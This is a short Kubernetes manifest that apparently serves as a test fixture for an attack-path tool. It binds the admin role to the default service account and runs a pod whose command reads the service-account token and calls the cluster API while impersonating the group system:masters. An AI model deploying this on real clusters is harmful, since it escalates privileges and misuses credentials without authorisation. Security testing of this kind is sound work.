kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: rbr-admin
  namespace: default
subjects:
- kind: ServiceAccount
  name: default
  namespace: default
roleRef:
  kind: Role #or ClusterRole
  name: admin
  apiGroup: rbac.authorization.k8s.io
---

apiVersion: v1
kind: Pod
metadata:
  name: kh-role-bind
  namespace: default
  labels:
    app: kubehound-edge-test
spec:
  containers:
  - name: kubehound-role-bind-crb-cr
    image: entlein/identity-impersonate:0.0.1
    imagePullPolicy: Always
    command: ["/bin/bash", "-c"]
    args: ["KUBE_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token); curl -sSk -H \"Authorization: Bearer $KUBE_TOKEN\" -H \"Impersonate-User: null\" -H \"Impersonate-Group: system:masters\" https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT_443_TCP_PORT/api/v1/pods ;  sleep infinity"]